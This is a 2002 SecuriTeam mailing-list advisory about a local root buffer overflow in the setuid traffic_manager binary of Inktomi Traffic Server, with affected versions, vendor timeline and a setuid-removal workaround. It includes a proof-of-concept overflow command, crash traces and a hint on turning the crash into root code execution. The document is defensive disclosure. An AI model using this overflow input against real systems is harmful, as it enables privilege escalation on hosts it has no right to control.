[NT] Vulnerability Report for Inktomi Traffic Server

From: support@securiteam.com
Date: 07/03/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed,  3 Jul 2002 08:06:43 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Vulnerability Report for Inktomi Traffic Server
------------------------------------------------------------------------

SUMMARY

Inktomi's Traffic Server product provides transparent web caching, access
control and content filtering. It is available for Linux, Solaris and
Windows platforms. A vulnerability that could allow a local attacker to
gain root access has been discovered in the UNIX version of the software.

DETAILS

Vulnerable Packages/Systems:
The local root vulnerability in traffic_manager exists in all current and
previous revisions of Inktomi Traffic Server, Traffic Edge, and Media-IXT.

Current product revisions are:
 * Media-IXT 3.0.4
 * Traffic Server / Media-IXT 4.0.18
 * Traffic Server / Media-IXT 4.0.20
 * Traffic Server / Media-IXT 5.1.3
 * Traffic Server / Media-IXT 5.2.0-R
 * Traffic Server / Media-IXT 5.2.1
 * Traffic Server / Media-IXT 5.2.2
 * Traffic Edge 1.1.2 (Traffic Server 5.2.1)
 * Traffic Edge 1.5.0 (Traffic Server 5.5)

Buffer overflow in traffic_manager executable
The traffic_manager executable is used to manage Traffic Server it is
installed setuid-root by default under the [installpath]/bin directory.
When traffic_manager is executed with a long command line argument, a
buffer overflow occurs. This vulnerability can be exploited locally to
gain root access.

Vendors contacted:
Inktomi Corporation (INKT)
 * Initial email sent: 2002-06-21
 * Acknowledged reception of initial contact: 2002-06-24
 * Official response and fix information: 2002-07-01

Solution/Vendor Information/Workaround:
The buffer overflow error in the "-path" option of the traffic_manager
command will be corrected to remove the vulnerability in all future
maintenance releases of Traffic Server, Media-IXT and Traffic Edge.

The identified vulnerability applies to command-line execution of
bin/traffic_manager, so the risk applies only to shell sessions already
connected to the proxy host as non-privileged users. The vulnerability
does not affect network services or access and cannot grant remote access
to the proxy host.

If you wish to block this local vulnerability, remove the setuid bit from
the traffic_manager executable. When traffic_manager is not setuid root,
the proxy will not be able to directly serve 'privileged' port numbers
less than 1024.

Some proxy configurations will require ARM config/ipnat.conf

Please refer to Inktomi's note on the bug at:
<http://support.inktomi.com/kb/070202-003.html>
http://support.inktomi.com/kb/070202-003.html with specific instructions
on how to reconfigure the products to operate properly without the SUID
flag set on the binary.

Contact <mailto:emailsupport@inktomi.com> emailsupport@inktomi.com for
assistance.

Technical Description - Exploit/Concept Code:
Traffic Manager installs the traffic_manager program as a root owned file
with the setuid bit set.

Below are the lines from install.sh that makes traffic_manager
setuid-root.

  # Adjust setuid commands
  chown root ${InstallDir}/bin/traffic_manager >>$LogFile 2>&1
  chmod 4755 ${InstallDir}/bin/traffic_manager >>$LogFile 2>&1
  if [ -d ${InstallDir}/bin/debug ] ; then
    chown root ${InstallDir}/bin/debug/traffic_manager >>$LogFile 2>&1
    chmod 4755 ${InstallDir}/bin/debug/traffic_manager >>$LogFile 2>&1
  fi

The overflow occurs when a string longer than 1700 bytes is passed as
argument to the -path option. The exploitability has been confirmed under
Solaris platform.

/inktomi/5.1.3/bin# ./traffic_manager -path `perl -e 'print "A"x1720'` <
[TrafficManager] ==> Kernel Sig 11; Reason: 1
[TrafficManager] ==> Cleaning up and reissuing signal #11
Abort(coredump)

truss output:
open64("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA", O_RDONLY) Err#78 ENAMETOOLONG
fstat(3, 0xFFBEC130) = 0
time() = 1024660377
getpid() = 27458 [27457]
putmsg(3, 0xFFBEB7E8, 0xFFBEB7DC, 0) = 0
open("/var/run/syslog_door", O_RDONLY) Err#2 ENOENT
    Incurred fault #5, FLTACCESS %pc = 0xFF0CF2E0
      siginfo: SIGBUS BUS_ADRALN addr=0x41414149
    Received signal #10, SIGBUS [caught]
      siginfo: SIGBUS BUS_ADRALN addr=0x41414149

Replacing 0x41414141 for a valid stack address and building the right
string it is possible to execute arbitrary code with root privileges.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:core.lists.bugtraq@core-sdi.com> Iván Arce.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.